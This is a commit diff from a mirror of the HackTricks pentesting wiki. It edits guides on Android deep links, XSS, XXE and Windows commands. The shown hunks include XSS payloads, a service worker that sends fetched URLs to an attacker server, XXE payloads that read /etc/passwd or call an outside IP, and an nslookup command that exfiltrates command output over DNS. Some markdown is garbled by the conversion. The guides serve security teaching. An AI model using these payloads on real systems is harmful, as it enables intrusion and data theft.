Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 401 pages modified

Browse source
This commit is contained in:
CPol 2020-11-20 10:55:52 +00:00 committed by gitbook-bot
parent fd2a491676
commit 21ef448842
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
5 changed files with 38 additions and 38 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
mobile-apps-pentesting/android-app-pentesting/README.md
View file

@ -425,6 +425,7 @@ A broadcast receiver will be waiting for a type of message. Depending on ho the
### **Exploiting Schemes / Deep links**
You ca look for deep links manually, using tools like MobSF or scripts like [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).
You can **open** a declared **scheme** using **adb** or a **browser**:
```bash

26
pentesting-web/xss-cross-site-scripting/README.md
View file

@ -10,7 +10,7 @@
1. Can you create new HTML tags?
2. Can you use events or attributes supporting `javascript:` protocol?
3. Can you create your own HTML tags?
4. Can you bypass protections?
4. Can you bypass protections?
5. Is the HTML content being interpreted by any client side JS engine \(_AngularJS_, _VueJS_, _Mavo_...\), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
6. If you cannot create HTML tags that execute JS code,could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md).
2. Inside a **HTML tag**:
@ -21,7 +21,7 @@
3. Inside **JavaScript code**:
1. Can you escape the `<script>` tag?
2. Can you escape the string and execute different JS code?
3. Are your input in template literals ````````?
3. Are your input in template literals \`\`\`\`\`\`\`\`?
4. Can you bypass protections?
4. If **used**:
1. You could exploit a **DOM XSS**, pay attention how your input is controlled and if your **controlled input is used by any sink.**
@ -61,7 +61,7 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
* `'-alert(1)-'`
* `';-alert(1)//`
* `\';alert(1)//`
* If reflected inside template literals \`\` you can **embed JS expressions** using `${ ... }` syntax: ``var greetings = `Hello, ${alert(1)}```
* If reflected inside template literals \`\` you can **embed JS expressions** using `${ ... }` syntax: ```var greetings =``Hello, ${alert\(1\)}\`\`\`
### DOM
@ -90,7 +90,7 @@ Once you have **located which tags are allowed**, you would need to **brute-forc
### Tags/Events brute-force
Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags \(in the same web page click on _**Copy events to clipboard**_ and follow the same procedure as before\).
Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags \(in the same web page click on _**Copy events to clipboard**_ and follow the same procedure as before\).
### Custom tags
@ -192,7 +192,7 @@ If you **cannot escape from the tag**, you could create new attributes inside th
### Within the attribute
Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.
Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.
Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
#### **Bypass inside event using HTML encoding/URL encode**
@ -320,10 +320,10 @@ If `<>` are being sanitised you can still **escape the string** where your input
### Template literals \`\`
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** ```````` . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.
Therefore, if you find that your **input** is being **reflected inside** a JS string that is using **backticks**, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** ``````````````` . This is known as template literals as they allow to **embedded JS expressions** using````````${ ... }`syntax.
Therefore, if you find that your **input** is being **reflected inside** a JS string that is using **backticks**, you can abuse the syntax`${ ... }\` to execute **arbitrary JS code**:
``var greetings = `Hello, <your input>```
```var greetings =``Hello, \`\`\`
This can be **abused** using: `${alert(1)}`
@ -554,8 +554,8 @@ for(var i=0; i<ports.length; i++) {
};
}
```
_Short times indicate a responding port_
_Longer times indicate no response_
_Short times indicate a responding port_ _Longer times indicate no response_
### Box to as for credentials
@ -615,7 +615,7 @@ In order to exploit this vulnerability you need to find:
* A way to **upload arbitrary JS** files to the server and a **XSS to load the service worker** of the uploaded JS file
* A **vulnerable JSONP request** where you can **manipulate the output \(with arbitrary JS code\)** and a **XSS** to **load the JSONP with a payload** that will **load a malicious service worker**.
In the following example I'm going to present a code to **register a new service worke**r that will listen to the `fetch` event and will **send to the attackers server each fetched URL** \(this is the code you would need to **upload** to the **server** or load via a **vulnerable JSONP** response\):
In the following example I'm going to present a code to **register a new service worke**r that will listen to the `fetch` event and will **send to the attackers server each fetched URL** \(this is the code you would need to **upload** to the **server** or load via a **vulnerable JSONP** response\):
```javascript
self.addEventListener('fetch', function(e) {
@ -728,7 +728,7 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
### XSS to SSRF
Got XSS on a **site that uses caching**? Try **upgrading that to SSRF** through Edge Side Include Injection with this payload:
Got XSS on a **site that uses caching**? Try **upgrading that to SSRF** through Edge Side Include Injection with this payload:
```python
<esi:include src="http://yoursite.com/capture" />
@ -859,7 +859,7 @@ More info:
## XSS resources
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
[http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list) [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
[https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)

46
pentesting-web/xxe-xee-xml-external-entity.md
View file

@ -4,7 +4,7 @@ An XML External Entity attack is a type of attack against an application that pa
## XML Basics
**Most of this part was taken from this amazing Portswigger page:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities)\*\*\*\*
**Most of this part was taken from this amazing Portswigger page:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities)
### What is XML? <a id="what-is-xml"></a>
@ -74,8 +74,8 @@ In this attack I'm going to test if a simple new ENTITY declaration is working
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
<stockCheck>
<productId>&toreplace;</productId>
<storeId>1</storeId>
<productId>&toreplace;</productId>
<storeId>1</storeId>
</stockCheck>
```
@ -112,8 +112,8 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck3>
```
@ -192,7 +192,7 @@ This DTD carries out the following steps:
* Uses the `eval` entity, which causes the dynamic declaration of the `error` entity to be performed.
* Uses the `error` entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the `/etc/passwd` file.
Invoke the external DTD error with:
Invoke the external DTD error with:
```markup
<?xml version="1.0" encoding="UTF-8"?>
@ -235,19 +235,19 @@ This DTD carries out the following steps:
* Redefines the XML parameter entity called `custom_entity`, which is already defined in the external DTD file. The entity is redefined as containing the [error-based XXE exploit](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages) that was already described, for triggering an error message containing the contents of the `/etc/passwd` file.
* Uses the `local_dtd` entity, so that the external DTD is interpreted, including the redefined value of the `custom_entity` entity. This results in the desired error message.
**Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso`
**Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso`
```markup
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
@ -336,12 +336,9 @@ Read the following post to **learn how to exploit a XXE uploading a PDF** file:
{% page-ref page="file-upload/pdf-upload-xxe-and-cors-bypass.md" %}
### Content-Type: From x-www-urlencoded to XML
If a POST request accepts the data in XML format, you could try to exploit a XXE in that request.
For example, if a normal request contains the following:
If a POST request accepts the data in XML format, you could try to exploit a XXE in that request. For example, if a normal request contains the following:
```markup
POST /action HTTP/1.0
@ -350,7 +347,8 @@ Content-Length: 7
foo=bar
```
Then you might be able submit the following request, with the same result:
Then you might be able submit the following request, with the same result:
```markup
POST /action HTTP/1.0
@ -366,7 +364,7 @@ To change the request you could use a Burp Extension named “**Content Type Con
```markup
Content-Type: application/json;charset=UTF-8
{"root": {"root": {
"firstName": "Avinash",
"lastName": "",
@ -378,7 +376,7 @@ Content-Type: application/json;charset=UTF-8
```markup
Content-Type: application/xml;charset=UTF-8
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]>
<root>
@ -406,7 +404,7 @@ This only work if the XML server accepts the `data://` protocol.
### UTF-7
You can use the [**"Encode Recipe**" of cyberchef here ](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to transform to UTF-7.
You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github.io/CyberChef/\#recipe=Encode\_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4\)to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to) transform to UTF-7.
```markup
<!xml version="1.0" encoding="UTF-7"?-->
@ -603,7 +601,7 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
## Tools
{% embed url="https://github.com/luisfontes19/xxexploiter" %}
{% embed url="https://github.com/luisfontes19/xxexploiter" caption="" %}
## More resources

1
todo/more-tools.md
View file

@ -110,6 +110,7 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
* [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : Hacking IoT \(Wifi, BLE, SSDP, MDNS\)
* [https://github.com/rackerlabs/scantron](https://github.com/rackerlabs/scantron) : automating scanning
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
##

2
windows/basic-cmd-for-pentesters.md
View file

@ -440,7 +440,7 @@ sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passi
#### Victim
_**for /f tokens**_ _\*\*_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
_**for /f tokens**_ \_\*\*\_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
```text
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami